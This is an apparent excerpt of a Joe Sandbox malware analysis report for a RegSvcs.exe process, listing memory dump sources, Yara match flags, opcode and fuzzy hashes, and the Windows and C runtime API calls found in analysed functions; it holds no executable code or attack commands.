                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: e1e541cc697c72612760aba5932447b04b84d38016bad34d9fc5a9235cfb8fec
                                                                • Instruction ID: 45bf559793447eb450c51cf3b4ee25093adbc89a2722d68c391a79c9a90dcb02
                                                                • Opcode Fuzzy Hash: e1e541cc697c72612760aba5932447b04b84d38016bad34d9fc5a9235cfb8fec
                                                                • Instruction Fuzzy Hash: B5610B71E512458FDB49DF7AE98079ABBF3AB85300F04C629D009AB368DF706C49CB51
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 4'^q
                                                                • API String ID: 0-1614139903
                                                                • Opcode ID: 1f5b388e5d080e60f664c42ae0563f07e2f4231953ded51c8e859fdeeb1cb198
                                                                • Instruction ID: b0fa1f5ec3ee1cb125ca3e4fceeec5692a3ab28f2609ca667f1e5b76fda2d031
                                                                • Opcode Fuzzy Hash: 1f5b388e5d080e60f664c42ae0563f07e2f4231953ded51c8e859fdeeb1cb198
                                                                • Instruction Fuzzy Hash: C0610C71E512498FDB09DF7AE98079ABBF3AB85300F04C629D009AB368DF706C49CB51
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                • Instruction ID: d5e3495c9826dce769b252ea72d1bcaf7b5d46a24141b332915225fd3cdae7ad
                                                                • Opcode Fuzzy Hash: 8976f0a61fc1960936828f21bd26f3318fd330ab7a4f50ce487ee3b945538f04
                                                                • Instruction Fuzzy Hash: 9852A471A047129FC708CF29C99066AB7E1FF88304F044A3EE896E7B81D739E955CB95
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                • Instruction ID: 17d22deff8d32e931318445bbea846c6b698fa6fcc44f6923348d96d7e24b863
                                                                • Opcode Fuzzy Hash: 20055dc05f39624d89f9d13173d00032c9ddb5f23ed3028259e70998ae7a08b4
                                                                • Instruction Fuzzy Hash: 0A329E70A087029FD318CF29C98472AB7E1BF84304F148A3EE89567781D779E955CBDA
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                • Instruction ID: cc67e10771130af0a5279b37c8f7fa75a2653c997645fd1ae8a0b8309c7f2627
                                                                • Opcode Fuzzy Hash: 020392db844ceed98276714fd2150c2ad4a639f6bad3fb02a1d0621011a6745a
                                                                • Instruction Fuzzy Hash: 48E1D6306083514FC708CF28C99456ABBE2EFC5304F198A7EE8D68B386D779D94ACB55
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 68cc5ef6d4c40f6f91ef50290881e1dcf57cdbabb8b4482e1bb08203b5163092
                                                                • Instruction ID: 19c88c0778d575f7c2cd07846076c4a3dba82b946ebfa449153cd41d1ed91691
                                                                • Opcode Fuzzy Hash: 68cc5ef6d4c40f6f91ef50290881e1dcf57cdbabb8b4482e1bb08203b5163092
                                                                • Instruction Fuzzy Hash: EAD12D30E00205CFDB55DFA9C958BAEBBF2BF84304F14855AE409AB3A5DB71D985CB81
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db15d8039ba02fe5a18086c9f8a12c625515c538710a43acc60c2d7cefdcf9f3
                                                                • Instruction ID: 7faafbbd72c7baa53a375e5a7ce1f2852b2d9e88e7c95d1858d6ba5274e41c67
                                                                • Opcode Fuzzy Hash: db15d8039ba02fe5a18086c9f8a12c625515c538710a43acc60c2d7cefdcf9f3
                                                                • Instruction Fuzzy Hash: 65C19F74E00218CFDB54DFA5D994B9DBBB2BF88300F2084A9D509AB369DB359E85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 818c9da2de5adbca38c10781bfecc9aa42b2b89f920df22bec0e2a301663edbb
                                                                • Instruction ID: 1a9598da7a672f11af60ceb7c9a6c807c95aad21b1acea135d987b9a8a3f9ce0
                                                                • Opcode Fuzzy Hash: 818c9da2de5adbca38c10781bfecc9aa42b2b89f920df22bec0e2a301663edbb
                                                                • Instruction Fuzzy Hash: 8DC19F74E00218CFDB54DFA5D994B9DBBB2BF88300F1084A9D909AB364DB359E85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 85aa4297b8e9ae6cb8c161edc91b3d6687d00354a8511bf269e7e208487d2581
                                                                • Instruction ID: 537a2ec27abb32e469e744a1c48468952da5e8fc51667865d3b32ac57a86965f
                                                                • Opcode Fuzzy Hash: 85aa4297b8e9ae6cb8c161edc91b3d6687d00354a8511bf269e7e208487d2581
                                                                • Instruction Fuzzy Hash: 8CC1A174E00218CFDB54DFA5D994B9DBBB2BF88300F2084A9D909AB365DB359E85CF50
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 839631521981de5c3c480e7bd0c9578f4b3a7b300031b1e94fe54a9f5f49099a
                                                                • Instruction ID: 46a7e108a7c77235c6ea2801157c24d0ba14f2f4317b9f2799530f982c8c1417
                                                                • Opcode Fuzzy Hash: 839631521981de5c3c480e7bd0c9578f4b3a7b300031b1e94fe54a9f5f49099a
                                                                • Instruction Fuzzy Hash: 73A19F32E00209CFCF46DFB5C8645DEB7B2FF85300B15856AE916AB225DB75D946CB80
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 35db497c99340ecfc39afc4cc8988d3aa24e76fd4c9f33b94309111df2255c81
                                                                • Instruction ID: 9aa9c8a175ea84fc05c32ba4833832e033c180dd86b73ed409765a819b26da11
                                                                • Opcode Fuzzy Hash: 35db497c99340ecfc39afc4cc8988d3aa24e76fd4c9f33b94309111df2255c81
                                                                • Instruction Fuzzy Hash: 1EA10571D106198EDB14DFA9D844BDDFBB1FF89300F14C6AAE408A7261EB709A84CF41
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df778db2c2e35f6bb387cb7caa47681062bcb9bb9470b31d8c050c9c77c59612
                                                                • Instruction ID: 838e47fb2a7a9841c5a002d57471516ae12adf6cf47d9cbf944074844bca02f9
                                                                • Opcode Fuzzy Hash: df778db2c2e35f6bb387cb7caa47681062bcb9bb9470b31d8c050c9c77c59612
                                                                • Instruction Fuzzy Hash: 2CC11DB0CA17058AD728CF25E94839A7B71FB853A4FD25B09D1616B2D0EFB414AECF44
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: afc1e826f98ce3d8c672e251440aeb4540248d005768dbc755b90417978e97a4
                                                                • Instruction ID: 1ac1d4df9d54aed36434fae1f0160afc0d2676ae3bab00e7d98ca68a070fcefb
                                                                • Opcode Fuzzy Hash: afc1e826f98ce3d8c672e251440aeb4540248d005768dbc755b90417978e97a4
                                                                • Instruction Fuzzy Hash: A15132B1D056198BE72CCF6B8D446CAFAF3AFC9304F04C1F9990CAA254DB740A858E41
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 80f0efcf405fe890676fe4ff0ec5914c3abe8e9abda3303b4185e6a2b851187e
                                                                • Instruction ID: 12682a1b8eeb1b7a29d504033068df3be15ef62064ec54fb86065a8641c278aa
                                                                • Opcode Fuzzy Hash: 80f0efcf405fe890676fe4ff0ec5914c3abe8e9abda3303b4185e6a2b851187e
                                                                • Instruction Fuzzy Hash: E541DDB4D00358DFDB14CFA9D984BAEBBF5AF09304F20902AE855BB250D774A885CF45
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2902088694.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_2930000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 74cadd913aaf17c981c9e58b9dbdf6881f0875f479c8c16e350086cf18558638
                                                                • Instruction ID: b8689991e7c5f615bceee57ab046d784643bb13e7e3fec9fdb577111bec7a76f
                                                                • Opcode Fuzzy Hash: 74cadd913aaf17c981c9e58b9dbdf6881f0875f479c8c16e350086cf18558638
                                                                • Instruction Fuzzy Hash: B4511671E056558BE72CCF6B9D447CAFAF3AFC9304F04C1F9994CA6264DB700A818E41
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30c30811328271a3ac5015c38fa84c6e7b148cc47da4d2a916edba8cb5d48f3f
                                                                • Instruction ID: a52729dc9215b66c62f463ebece165a4255b2dda01c63d9f01a68fc59b2f9908
                                                                • Opcode Fuzzy Hash: 30c30811328271a3ac5015c38fa84c6e7b148cc47da4d2a916edba8cb5d48f3f
                                                                • Instruction Fuzzy Hash: 7441DCB5D01208AFCB14CFA9E984ADEFBF4EB49310F20901AE819BB310D775A946CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a68c302e7e202cd77adaea5b117fdd6a5f34ce61218408672bb8cd0c989da84e
                                                                • Instruction ID: 9875b958732c0b25d6758ec9b89b51333727743ac2400fee80879de975315c72
                                                                • Opcode Fuzzy Hash: a68c302e7e202cd77adaea5b117fdd6a5f34ce61218408672bb8cd0c989da84e
                                                                • Instruction Fuzzy Hash: C64103B0E012488FDB18DFAAD8546EEFBF2AF88300F24D12AC519BB254DB345946CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: dac9256f89f1be01acd1a37f2ca4f618037a7505eed12836525be3c787439b9d
                                                                • Instruction ID: 32b0a3c13e20fd8aa225aad73eead5ffebc9403fad761b200af9af33aa41ad31
                                                                • Opcode Fuzzy Hash: dac9256f89f1be01acd1a37f2ca4f618037a7505eed12836525be3c787439b9d
                                                                • Instruction Fuzzy Hash: 2F41E270E012498BDB58DFAAD8546EEFBF2AF88300F24D12AC519BB254DB345946CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2905520760.00000000050F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_50f0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: aed271b7eac5003af485f9f477e4598d3582c36ae901d4f3de3d06a38e684ea5
                                                                • Instruction ID: 473abaf751af26e0185d7a0b45cd4a2eed5114f8c4fa04be83d5eb68e97af376
                                                                • Opcode Fuzzy Hash: aed271b7eac5003af485f9f477e4598d3582c36ae901d4f3de3d06a38e684ea5
                                                                • Instruction Fuzzy Hash: 0041F5B0E01208CBDB58DFAAE9546EEFBF2AF88300F20D129D518BB654DB345946CF54
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2907466933.00000000064D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064D0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_64d0000_RegSvcs.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2220d56d4731e434142c5b875486fa669ead28316c8bd27a551827f814e1a875
                                                                • Instruction ID: 9e4eb9a820971203915b14d047b931dd316c72bc126b521adb9010de8717f3db
                                                                • Opcode Fuzzy Hash: 2220d56d4731e434142c5b875486fa669ead28316c8bd27a551827f814e1a875
                                                                • Instruction Fuzzy Hash: A3319AB5D012189FCB14CFA9E584ADEFBF5EB49310F14902AE818BB310D774A945CF98
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                APIs
                                                                • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,026518C8), ref: 004170C5
                                                                • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                • _malloc.LIBCMT ref: 0041718A
                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                • _malloc.LIBCMT ref: 0041724C
                                                                • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                • __freea.LIBCMT ref: 004172A4
                                                                • __freea.LIBCMT ref: 004172AD
                                                                • ___ansicp.LIBCMT ref: 004172DE
                                                                • ___convertcp.LIBCMT ref: 00417309
                                                                • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                • _malloc.LIBCMT ref: 00417362
                                                                • _memset.LIBCMT ref: 00417384
                                                                • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                • ___convertcp.LIBCMT ref: 004173BA
                                                                • __freea.LIBCMT ref: 004173CF
                                                                • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                • String ID:
                                                                • API String ID: 3809854901-0
                                                                • Opcode ID: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                • Opcode Fuzzy Hash: b16ff40dd4ba9ebc371e1f7effab867f6711c58894302612c2f4823bb6b89e2c
                                                                • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                APIs
                                                                • _malloc.LIBCMT ref: 004057DE
                                                                  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                • _malloc.LIBCMT ref: 00405842
                                                                • _malloc.LIBCMT ref: 00405906
                                                                • _malloc.LIBCMT ref: 00405930
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _malloc$AllocateHeap
                                                                • String ID: 1.2.3
                                                                • API String ID: 680241177-2310465506
                                                                • Opcode ID: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                • Opcode Fuzzy Hash: 64d57b24c90c17737e8f9baa349f19b9f9970d6aaf881d525023fd74c78c4ea3
                                                                • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.2900256489.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000007.00000002.2900256489.0000000000426000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000007.00000002.2900256489.0000000000436000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_400000_RegSvcs.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                • String ID:
                                                                • API String ID: 3886058894-0
                                                                • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
